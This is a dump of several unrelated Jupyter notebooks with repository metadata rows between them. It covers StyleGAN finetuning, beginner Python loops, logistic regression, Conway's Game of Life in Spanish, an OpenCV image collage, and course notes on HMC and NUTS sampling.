latent = e4e_projection(style_aligned, style_code_path, device)
else:
latent = torch.load(style_code_path)['latent']
targets.append(transform(style_aligned).to(device))
latents.append(latent.to(device))
targets = torch.stack(targets, 0)
latents = torch.stack(latents, 0)
display_image(utils.make_grid(targets, normalize=True, range=(-1, 1)), title='Style References')
# + colab={"base_uri": "https://localhost:8080/"} id="_qNPut_ch3gr" outputId="d876fef2-71d1-4495-aedf-e34e9c544056" cellView="form"
#@title Finetune StyleGAN
#@markdown alpha controls the strength of the style
alpha = 1.0 #@param {type:"slider", min:0, max:1, step:0.1}
alpha = 1-alpha
#@markdown Tries to preserve color of original image by limiting family of allowable transformations. Set to false if you want to transfer color from reference image. This also leads to heavier stylization
preserve_color = False #@param{type:"boolean"}
#@markdown Number of finetuning steps. Different style reference may require different iterations.
num_iter = 500 #@param {type:"number"}
lpips_fn = lpips.LPIPS(net='vgg').to(device)
g_optim = optim.Adam(generator.parameters(), lr=2e-3, betas=(0, 0.99))
# Which layers to swap for generating a family of plausible real images -> fake image
if preserve_color:
id_swap = [7,9,11,15,16,17]
else:
id_swap = list(range(7, generator.n_latent))
for idx in tqdm(range(num_iter)):
if preserve_color:
random_alpha = 0
else:
random_alpha = np.random.uniform(alpha, 1)
mean_w = generator.get_latent(torch.randn([latents.size(0), latent_dim]).to(device)).unsqueeze(1).repeat(1, generator.n_latent, 1)
in_latent = latents.clone()
in_latent[:, id_swap] = alpha*latents[:, id_swap] + (1-alpha)*mean_w[:, id_swap]
img = generator(in_latent, input_is_latent=True)
loss = lpips_fn(F.interpolate(img, size=(256,256), mode='area'), F.interpolate(targets, size=(256,256), mode='area')).mean()
g_optim.zero_grad()
loss.backward()
g_optim.step()
# + colab={"base_uri": "https://localhost:8080/", "height": 662} cellView="form" id="-zf7xz33ty_E" outputId="2af7e457-00ae-4f43-ce13-138580bcc3fe"
#@title Generate results
n_sample = 5#@param {type:"number"}
seed = 3000 #@param {type:"number"}
torch.manual_seed(seed)
with torch.no_grad():
generator.eval()
z = torch.randn(n_sample, latent_dim, device=device)
original_sample = original_generator([z], truncation=0.7, truncation_latent=mean_latent)
sample = generator([z], truncation=0.7, truncation_latent=mean_latent)
original_my_sample = original_generator(my_w, input_is_latent=True)
my_sample = generator(my_w, input_is_latent=True)
# display reference images
style_images = []
for name in names:
style_path = f'style_images_aligned/{strip_path_extension(name)}.png'
style_image = transform(Image.open(style_path))
style_images.append(style_image)
face = transform(aligned_face).to(device).unsqueeze(0)
style_images = torch.stack(style_images, 0).to(device)
my_output = torch.cat([style_images, face, my_sample], 0)
display_image(utils.make_grid(my_output, normalize=True, range=(-1, 1)), title='My sample')
output = torch.cat([original_sample, sample], 0)
display_image(utils.make_grid(output, normalize=True, range=(-1, 1), nrow=n_sample), title='Random samples')
| 12,287 |
/loop.ipynb
|
4b91df1d9d6ab7025dcf8fbf771a4cdfbd494b8c
|
[] |
no_license
|
Vamsi8352/python
|
https://github.com/Vamsi8352/python
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 14,305 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# +
i=1
while i<=5:
print('vamsi', end=' ')
j=1
while j<=3:
print('styles', end=' ')
j=j+1
i=i+1
print()
# -
x=['vamsi', 25, 4.2]
for i in x:
print(i)
x=['vamsi', 25, 4.2]
print(x)
x=['vamsi', 25, 4.2]
for i in x:
print(i,end=' ')
# +
for i in ['vamsikrishna']:
print(i,end=' ')
# +
for i in range(10):
print(i,end=' ')
# -
for i in range(100,50,-6):
print(i,end=' ')
for i in range(50,100,6):
print(i,end=' ')
for i in range(50,61):
if i%5!=0:
print(i)
for i in range(50,61):
if i%5!=0:
print(i,end=' ')
for i in range(50,61):
if i%5!=0:
continue
print(i)
for i in range(50,61):
if i%5==0:
continue
print(i)
for i in range(50,61):
if i%5!=0:
print(i,)
for i in range(50,61):
if i%3==0:
continue
print(i)
for i in range(50,61):
if i%3!=0 and i%5!=0:
print(i)
# +
for i in range (5):
for j in range (4):
print('#',end=' ')
print()
# -
for i in range (5):
for j in range (i):
print('#',end=' ')
print()
for i in range (5):
for j in range (i+1):
print('#',end=' ')
print()
for i in range (5):
for j in range (5-i):
print('#',end=' ')
print()
print('poojari "rajesh" \'varma\'')
# +
print('poojari "rajesh" \'varma\'')
_+'gorantla'
# -
print('poojari "rajesh" \'varma\'')
_+'vamsi'
print('poojari "rajesh" \'varma\'')
_ + 'sathya'
# +
print('poojari "rajesh" \'varma\'')
print(_ + 'sathya',end=' ')
# -
print('poojari "rajesh" \'varma\'')
result='gorantla'
print (result)
result + 'vamsi'
sathya='result+vamsi'
for i in ['sathya']:
print(i,end=' ')
x=[25,2,4,5,5,248,]
x.append(56)
print(x)
x=[25,2,4,5,5,248,]
x.insert(2,56)
print(x)
x=[25,2,4,5,5,248,]
x.pop(5)
print(x)
x=[25,2,4,5,5,248]
print(x.pop(3))
x=[25,2,4,5,5,248]
del x[2:]
print(x)
x=[25,2,4,5,5,248]
x. extend([1,2,3,4,5])
print(x)
print(min(x))
print(max(x))
print(sum(x))
print(min(x))
x=[25,2,4,5,5,248]
x.append(54)
x. insert(5,25)
x.extend([56,7,8,9,])
del x[:]
print(x)
x='6.78.878'
print(type(x))
theta
delta = np.zeros((no_attributes,1))
totalLogLikelihood = 0
#Check each data point
for instance, actualOutput in zip(X_train,Y_train):
if actualOutput == Class:
actualOutput = 1
else:
actualOutput = 0
instance=instance.reshape(no_attributes,1)
dotResult = np.dot(theta.T, instance)
predictedOutput=sigmoid(dotResult).squeeze()
#Calculate the derivative value for this data point
derivativeValue = instance*(actualOutput-predictedOutput)
#Calculate the amount to be added with theta
delta += learning_rate*derivativeValue
logLikelihood = actualOutput*np.log(predictedOutput)+(1-actualOutput)*np.log(1-predictedOutput)
totalLogLikelihood += logLikelihood
theta = theta + delta
#After each 100 iteration, print the status
if icount%100==0:
print(icount)
print(totalLogLikelihood)
print(theta)
#print(theta.shape)
return theta
def fit_implementation2(X_train, Y_train,Class, learning_rate=0.0005, max_iteration=1000):
#Adding a column of 1's so that the first element of each input is always 1
#It would be multiplied with theta_0 later
X_train= np.insert(X_train, 0, values=1, axis=1)
no_attributes = X_train.shape[1]
Y_train = Y_train.reshape(-1,1)
Y_train = np.where( Y_train ==Class,1,0)
#Initialize model parameters theta
theta = np.zeros((no_attributes,1))
#Run number of iterations
for icount in range(max_iteration):
#delta is the quantity that will be added with theta during updating theta
delta = np.zeros((no_attributes,1))
totalLogLikelihood = 0
dotResult = np.dot(X_train,theta)
#print("Dot Result: ",dotResult.shape)
predictedValue = sigmoid(dotResult)
#print("predictedValue: ",predictedValue.shape)
diff = Y_train - predictedValue
#print("diff: ",diff.shape)
derivativeValue = X_train*diff
#print("derivativeValue: ",derivativeValue.shape)
delta = learning_rate*derivativeValue
#print("delta: ",delta.shape)
delta = np.sum(delta, axis=0).reshape(no_attributes,-1)
#print("delta Updated: ",delta.shape)
logLikelihood = Y_train*np.log(predictedValue) + (1-Y_train)*np.log(1-predictedValue)
#print("logLikelihood: ",logLikelihood.shape)
totalLogLikelihood = np.sum(logLikelihood)
theta = theta + delta
#After each 100 iteration, print the status
if icount%100==0:
print(icount)
print(totalLogLikelihood)
print(theta)
#print(theta.shape)
return theta
#parameters = fit_implementation(X_train, Y_train)
parameters = []
for i in range(classes):
parameters.append(fit_implementation(X_train, Y_train,i+1))
# +
def prediction(X_test, Y_test, thetas):
#Adding a column of 1's so that the first element of each input is always 1
#It would be multiplied with theta_0 later
X_test= np.insert(X_test, 0, values=1, axis=1)
no_attributes = X_test.shape[1]
correctCount = 0
totalCount = 0
#Check each data point
for instance, actualOutput in zip(X_test,Y_test):
instance=instance.reshape(no_attributes,1)
predictedValue = []
predictedOutput = -1
for theta in thetas:
dotResult = np.dot(theta.T, instance)
predictedValue.append(sigmoid(dotResult).squeeze())
predictedOutput = predictedValue.index(max(predictedValue)) +1
print(predictedOutput, actualOutput)
if predictedOutput == actualOutput:
correctCount += 1
totalCount += 1
print("Total Correct Count: ",correctCount," Total Wrong Count: ",totalCount-correctCount," Accuracy: ",(correctCount*100)/(totalCount))
prediction(X_test, Y_test, parameters)
# -
| 6,549 |
/notebooks_students/YOUSSEF_Ads.ipynb
|
ce543ad67efed57a7efed463e6c5a439b5f36e7d
|
[] |
no_license
|
alexisperrier/emines_ts
|
https://github.com/alexisperrier/emines_ts
| 0 | 20 | null | 2021-01-29T06:39:32 | 2021-01-29T06:39:17 |
Jupyter Notebook
|
Jupyter Notebook
| false | false |
.py
| 923,335 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: python 3.7-inteligencia
# language: python
# name: simulation
# ---
# ## <center> JUEGO DE LA VIDA </center>##
# **Historia**
#
# El juego de la vida es un autómata celular diseñado por el matemático británico John Horton Conway en 1970.
#
# Hizo su primera aparición pública en el número de octubre de 1970 de la revista Scientific American, en la columna de juegos matemáticos de Martin Gardner. Desde un punto de vista teórico, es interesante porque es equivalente a una máquina universal de Turing, es decir, todo lo que se puede computar algorítmicamente se puede computar en el juego de la vida.
#
# Desde su publicación, ha atraído mucho interés debido a la gran variabilidad de la evolución de los patrones. Se considera que la vida es un buen ejemplo de emergencia y autoorganización. Es interesante para los científicos, matemáticos, economistas y otros observar cómo patrones complejos pueden provenir de la implementación de reglas muy sencillas.
#
# La vida tiene una variedad de patrones reconocidos que provienen de determinadas posiciones iniciales. Poco después de la publicación, se descubrieron el pentaminó R, el planeador o caminador, lo que atrajo un mayor interés hacia el juego.
# ## Reglas ##
#
# 1. Cualquier célula con menos de 2 vecinos muere, por soledad.
# 2. Cualquier célula con 2 a 3 vecinos sobrevive.
# 3. Cualquier célula con más de 3 vecinos muere, por sobre población.
# 4. En los espacios con exactamente 3 vecinos, nace una nueva célula.
# **Ejemplo de Aplicación**
#
# **Formulacion de Problema**
# Usar las reglas del juego de la vida y aplicarlas en dos muestras.Para el ejemplo se a tomado como muestras dos ángulos uno de 90° y otro de 45° los mismos que se encuentran representados por celulas vivas(numero 1) y celulas muertas(numero 0).
#
# **Plan de Experimentacion**
# Se tienen implementados dos angulos de diferentes medidas.
# Para la representacion de un ángulo de 90° se han graficado 61 celulas y 195 celulas muertas.
# Para la representacion del ángulo de 45° se han tomado 55 celulas vivas y 201 celulas muertas.
#
# **Figura a aplicar**
#
#
# <img src="2.png">
# <center>Ángulo de 90%</center>
# +
from time import sleep
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from matplotlib import animation
import random
from matplotlib.widgets import Button
# %matplotlib notebook
def vecindario(b):
"""Array de células vivas en el vecindario."""
vecindario = (
np.roll(np.roll(b, 1, 1), 1, 0) + # Abajo-derecha
np.roll(b, 1, 0) + # Abajo
np.roll(np.roll(b, -1, 1), 1, 0) + # Abajo-izquierda
np.roll(b, -1, 1) + # Izquierda
np.roll(np.roll(b, -1, 1), -1, 0) + # Arriba-izquierda
np.roll(b, -1, 0) + # Arriba
np.roll(np.roll(b, 1, 1), -1, 0) + # Arriba-derecha
np.roll(b, 1, 1) # Derecha
)
return vecindario
def paso(b):
"""Paso en el juego de la vida de Conway."""
v = vecindario(b)
buffer_b = b.copy() # Hacemos una copia de la matriz
for i in range(buffer_b.shape[0]):
for j in range(buffer_b.shape[1]):
if v[i, j] == 3 or (v[i, j] == 2 and buffer_b[i, j]):
buffer_b[i, j] = 1
else:
buffer_b[i, j] = 0
return buffer_b
# Parámetros del problema
GENERACIONES = 50
N = 20 # Dimensiones del tablero (N, M)
M = 20
pause = False # Pausa
def onClick(event):
global pause
pause ^= True
# Construimos el tablero
tablero = np.zeros((N, M), dtype = int)
# CONDICIONES INICIALES (CASILLAS ENCENDIDAS)
# Añadimos una nave
tablero=np.array(
[[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]])
def randomize(event):
for i in range(0, N-1):
for j in range(0, N-1):
tablero[i, j] = random.randint(0, 1)
global b
b = tablero
imagen.set_data(b)
print(tablero)
# Creamos la figura, formateo diverso
fig = plt.figure(figsize=(4, 4))
ax = fig.add_subplot(111)
# ax.axis('off')
b = tablero
imagen = ax.imshow(b, interpolation="none", aspect = "equal", cmap=cm.gray_r)
# Major ticks
# ax.set_xticks(np.arange(0, N, 1));
ax.set_yticks(np.arange(0, N, 1));
# Labels for major ticks
# ax.set_xticklabels(np.arange(1, N+1, 1));
ax.set_yticklabels(np.arange(1, N+1, 1));
# Minor ticks
# ax.set_xticks(np.arange(-.5, N, 1), minor=True);
# ax.set_yticks(np.arange(-.5, N, 1), minor=True);
plt.tick_params(
axis='x', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
bottom=False, # ticks along the bottom edge are off
top=False, # ticks along the top edge are off
labelbottom=False) # labels along the bottom edge are off
def animate(i):
global b
if not pause: # Pause check
print(i) # El parámetro de avance: la pausa no le afecta
b = paso(b) # Iteramos la animación
imagen.set_data(b)
return imagen,
# Animacion
anim = animation.FuncAnimation(fig, animate, frames=GENERACIONES, blit=True, interval = 800, repeat = True)
plt.show()
# -
# **Figura a aplicar**
# <img src="1.png">
# <center>Ángulo de 45%</center>
# +
from time import sleep
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from matplotlib import animation
import random
from matplotlib.widgets import Button
# %matplotlib notebook
def vecindario(b):
"""Array de células vivas en el vecindario."""
vecindario = (
np.roll(np.roll(b, 1, 1), 1, 0) + # Abajo-derecha
np.roll(b, 1, 0) + # Abajo
np.roll(np.roll(b, -1, 1), 1, 0) + # Abajo-izquierda
np.roll(b, -1, 1) + # Izquierda
np.roll(np.roll(b, -1, 1), -1, 0) + # Arriba-izquierda
np.roll(b, -1, 0) + # Arriba
np.roll(np.roll(b, 1, 1), -1, 0) + # Arriba-derecha
np.roll(b, 1, 1) # Derecha
)
return vecindario
def paso(b):
"""Paso en el juego de la vida de Conway."""
v = vecindario(b)
buffer_b = b.copy() # Hacemos una copia de la matriz
for i in range(buffer_b.shape[0]):
for j in range(buffer_b.shape[1]):
if v[i, j] == 3 or (v[i, j] == 2 and buffer_b[i, j]):
buffer_b[i, j] = 1
else:
buffer_b[i, j] = 0
return buffer_b
# Parámetros del problema
GENERACIONES = 50
N = 17 # Dimensiones del tablero (N, M)
M = 12
pause = False # Pausa
def onClick(event):
global pause
pause ^= True
# Construimos el tablero
tablero = np.zeros((N, M), dtype = int)
# CONDICIONES INICIALES (CASILLAS ENCENDIDAS)
# Añadimos una nave
tablero=np.array(
[[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]])
def randomize(event):
for i in range(0, N-1):
for j in range(0, N-1):
tablero[i, j] = random.randint(0, 1)
global b
b = tablero
imagen.set_data(b)
print(tablero)
# Creamos la figura, formateo diverso
fig = plt.figure(figsize=(4, 4))
ax = fig.add_subplot(111)
#ax.axis('off')
b = tablero
imagen = ax.imshow(b, interpolation="none", aspect = "equal", cmap=cm.gray_r)
# Major ticks
#ax.set_xticks(np.arange(0, N, 1));
#ax.set_yticks(np.arange(0, N, 1));
# Labels for major ticks ax.set_xticklabels(np.arange(1, N+1, 1));
ax.set_yticklabels(np.arange(1, N+1, 1));
# Minor ticks
ax.set_xticks(np.arange(-.5, N, 1), minor=True);
ax.set_yticks(np.arange(-.5, N, 1), minor=True);
plt.tick_params(
axis='x', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
bottom=False, # ticks along the bottom edge are off
top=False, # ticks along the top edge are off
labelbottom=False) # labels along the bottom edge are off
def animate(i):
global b
if not pause: # Pause check
print(i) # El parámetro de avance: la pausa no le afecta
b = paso(b) # Iteramos la animación
imagen.set_data(b)
return imagen,
# Animacion
anim = animation.FuncAnimation(fig, animate, frames=GENERACIONES, blit=True, interval = 800, repeat = True)
plt.show()
# -
# **Ejemplo de Aplicación**
# En la animación anterior se observo 61 interaciones quedando 8 celulas vivas.
# **Prueba de ángulo de 45° con 49 celulas vivas**
# +
from time import sleep
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from matplotlib import animation
import random
from matplotlib.widgets import Button
def vecindario(b):
"""Array de células vivas en el vecindario."""
vecindario = (
np.roll(np.roll(b, 1, 1), 1, 0) + # Abajo-derecha
np.roll(b, 1, 0) + # Abajo
np.roll(np.roll(b, -1, 1), 1, 0) + # Abajo-izquierda
np.roll(b, -1, 1) + # Izquierda
np.roll(np.roll(b, -1, 1), -1, 0) + # Arriba-izquierda
np.roll(b, -1, 0) + # Arriba
np.roll(np.roll(b, 1, 1), -1, 0) + # Arriba-derecha
np.roll(b, 1, 1) # Derecha
)
return vecindario
def paso(b):
"""Paso en el juego de la vida de Conway."""
v = vecindario(b)
buffer_b = b.copy() # Hacemos una copia de la matriz
for i in range(buffer_b.shape[0]):
for j in range(buffer_b.shape[1]):
if v[i, j] == 3 or (v[i, j] == 2 and buffer_b[i, j]):
buffer_b[i, j] = 1
else:
buffer_b[i, j] = 0
return buffer_b
# Parámetros del problema
GENERACIONES = 50
N = 17 # Dimensiones del tablero (N, M)
M = 12
pause = False # Pausa
def onClick(event):
global pause
pause ^= True
# Construimos el tablero
tablero = np.zeros((N, M), dtype = int)
# CONDICIONES INICIALES (CASILLAS ENCENDIDAS)
# Añadimos una nave
tablero=np.array(
[[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]])
def randomize(event):
for i in range(0, N-1):
for j in range(0, N-1):
tablero[i, j] = random.randint(0, 1)
global b
b = tablero
imagen.set_data(b)
print(tablero)
# Creamos la figura, formateo diverso
fig = plt.figure(figsize=(4, 4))
ax = fig.add_subplot(111)
# ax.axis('off')
b = tablero
imagen = ax.imshow(b, interpolation="none", aspect = "equal", cmap=cm.gray_r)
# Major ticks
# ax.set_xticks(np.arange(0, N, 1));
ax.set_yticks(np.arange(0, N, 1));
# Labels for major ticks
# ax.set_xticklabels(np.arange(1, N+1, 1));
ax.set_yticklabels(np.arange(1, N+1, 1));
# Minor ticks
# ax.set_xticks(np.arange(-.5, N, 1), minor=True);
# ax.set_yticks(np.arange(-.5, N, 1), minor=True);
plt.tick_params(
axis='x', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
bottom=False, # ticks along the bottom edge are off
top=False, # ticks along the top edge are off
labelbottom=False) # labels along the bottom edge are off
def animate(i):
global b
if not pause: # Pause check
print(i) # El parámetro de avance: la pausa no le afecta
b = paso(b) # Iteramos la animación
imagen.set_data(b)
return imagen,
# Animacion
anim = animation.FuncAnimation(fig, animate, frames=GENERACIONES, blit=True, interval = 800, repeat = True)
plt.show()
# -
# En el ejemplo anterior se muestra la animación del angulo de 45 grados con 49 celulas vivas , en la ultima etapa las interaciones se vuelven repetitivas e infinitas.
#
#
# **Conclusión**
#
# Según los análisis anteriores podemos decir que a pesar de que las figuras representadas tenian diferente tamaño en grados pero casi el mismo número de celulas muertas , el resultado de celulas muertas fue el mismo pero en diferente área de plano cartesiano.
# En el segundo caso se comparó los dos ángulos de 45° pero con diferentes número de celulas vivas en donde con menor número de celulas se obtuvo un resultado de transacíones repetitivas.
#
| 14,267 |
/module2-intermediate-linear-algebra/Gabe_Flomo_Intermediate_Linear_Algebra_Assignment.ipynb
|
4c4598c4b8015f3624102a7f531478aee363ddaa
|
[] |
no_license
|
Gabe-flomo/DS-Unit-1-Sprint-4-Linear-Algebra
|
https://github.com/Gabe-flomo/DS-Unit-1-Sprint-4-Linear-Algebra
| 1 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 63,344 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
#import library
import cv2
import numpy as np
virat=cv2.imread("viratk.jpg")
mahi=cv2.imread("mahi1.jpg")
cv2.imshow("Virat",virat)
cv2.imshow("Mahi",mahi)
cv2.waitKey()
cv2.destroyAllWindows()
virat.shape
mahi.shape
mahi=mahi[10:500, 30:600]
cv2.imshow("Mahi",mahi)
cv2.waitKey()
cv2.destroyAllWindows()
virat=virat[10:500, 30:600]
cv2.imshow("Virat",virat)
cv2.waitKey()
cv2.destroyAllWindows()
#Collage
combine = np.hstack((mahi, virat ))
cv2.imshow("Combine images", combine)
cv2.waitKey()
cv2.destroyAllWindows()
| 792 |
/cs/Lecture 12 computer tasks and solutions-20171017/Lecture 12 notes and exercises.ipynb
|
0bb4c971af260095294596e0b87fdd198986c45d
|
[] |
no_license
|
mdmohsinalikhan/others
|
https://github.com/mdmohsinalikhan/others
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 8,787 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] deletable=true editable=true
# University of Helsinki, Department of Mathematics and Statistics
# MAST32001 Computational Statistics I, Autumn 2017
# Antti Honkela
#
# # Lecture 12: MCMC and gradients 2: HMC tuning with NUTS and HMC for posterior inference
#
# In this lecture we will consider two topics: automatic tuning using the no-U-turn-sampler (NUTS) and applying HMC for sampling from the posterior distribution of a Bayesian model.
#
# ## HMC tuning with NUTS
#
# As shown by the problems of Lecture 11, tuning the stepsize $\epsilon$ and number of leapfrog steps $L$ in HMC can be nontrivial.
#
# The No-U-Turn Sampler (NUTS) of Hoffman and Gelman provides a neat way of avoiding this issue. Intuitively, NUTS works by iteratively extending the path until it observes a U-turn of the path turning back on itself. In order to guarantee detailed balance, the path is extended both forward and backward in virtual time. Furthermore instead of a single accept/reject choice, the algorithm samples the next point among the set of candidates generated along the path. The algorithm also includes a heuristic for tuning $\epsilon$.
#
# Most modern Bayesian inference software packages use NUTS as the default MCMC algorithm for cases where it is applicable (models with continuous variables).
#
# ## Further reading:
#
# Hoffman & Gelman: The No-U-Turn Sampler: Adaptively Setting Path Lengths in Hamiltonian Monte Carlo. JMLR 15:1593-1623 (2014).
# http://www.jmlr.org/papers/volume15/hoffman14a/hoffman14a.pdf
#
# Radford M. Neal: MCMC using Hamiltonian Dynamics
# https://arxiv.org/pdf/1206.1901.pdf
# (A classical and very comprehensive HMC tutorial)
#
# Michael Betancourt: A Conceptual Introduction to Hamiltonian Monte Carlo
# https://arxiv.org/pdf/1701.02434.pdf
# (A more modern HMC tutorial)
#
# -
# ## 0. HMC with fixed code
#
# Rerun the examples from Lecture 11 using the fixed HMC sampler. (I am very sorry about the mistake in the original code!)
#
# ## 1. NUTS
#
# Redo the examples from Lecture 11 using the No-U-Turn Sampler of Hoffman & Gelman. How many samples do you need to get a good representation of the target density?
#
# If you are familiar with Python, it is a good exercise to re-implement the NUTS algorithm (Algorithm 6 in Hoffman & Gelman). If you do not feel up to the task, you can try the example implementation available at
# http://www.helsinki.fi/~ahonkela/teaching/compstats1/nuts.py
#
# Hint: to use the example code, save the file to the same directory as this notebook, run
# ``` {python}
# import nuts
# nuts.nuts6(...)
# ```
# You can use `? nuts.nuts6` to get help.
# + [markdown] deletable=true editable=true
# ## 2. HMC sampling for posterior inference in linear regression
#
# Let us revisit Problem 4 from Lecture 4 where we studied linear regression using maximum likelihood estimation.
# We will use data from the Framingham Heart Study that studies the association between heart disease and its causes.
#
# A description of the data and its fields can be found at http://www.maths.utas.edu.au/DHStat/Data/Flow.html
#
# 1. Load the data using the below code. Standardise the data by subtracting the mean and dividing each variable by two standard deviations (see http://www.stat.columbia.edu/~gelman/research/published/standardizing7.pdf). Fit all the models using the standardised data as this makes sampling a lot easier.
# 2. Using the same normal log-likelihood as Problem 4.2 from Lecture 4 and priors
# $$ p(\alpha) = \mathcal{N}(\alpha;\; 0, 2^2) \\
# p(\beta) = \mathcal{N}(\beta;\; 0, 2^2), $$
# use HMC / NUTS to draw samples from the posterior distribution. How does the posterior compare to the maximum likelihood estimates obtained at Lecture 4?
# 3. Change the likelihood to use the Laplace distribution for the residuals $\epsilon_i$ while keeping the same priors. Repeat the previous task.
# +
import pandas as pd
import autograd.numpy as np
import autograd
from scipy.optimize import minimize
# load the data from CSV file using pandas
fram = pd.read_csv('http://www.helsinki.fi/~ahonkela/teaching/compstats1/fram.txt', sep='\t')
# convert the variables of interest to numpy arrays for autograd compatibility
# input: Framingham relative weight - the ratio of the subjects weight to the median weight for their sex-height group
x = np.array(fram['FRW'])
# target: Systolic blood pressure, examination 1
y = np.array(fram['SBP'])
def standardize(x):
# Remove the next line and replace with your implementation
raise(NotImplementedError("Not implemented yet"))
xs = standardize(x)
ys = standardize(y)
# -
# ## 3. HMC sampling for posterior inference 2
#
# Apply HMC / NUTS sampling to perform Bayesian inference over the mean $\mu$ and the standard deviation $\sigma$ in a normal model
# $$ p(x_i | \mu, \sigma^2) = \mathcal{N}(x_i;\; \mu, \sigma^2) $$
# for a data set $X = (x_i)_{i=1}^n$ loaded below.
#
# We will use the same conjugate priors as in Exercise 5 for Week 4:
# $$ p(\mu) = \mathcal{N}(\mu;\; \mu_0, \sigma_0^2) \\ p(\sigma^2) = \mathrm{InvGamma}(\alpha, \beta), $$
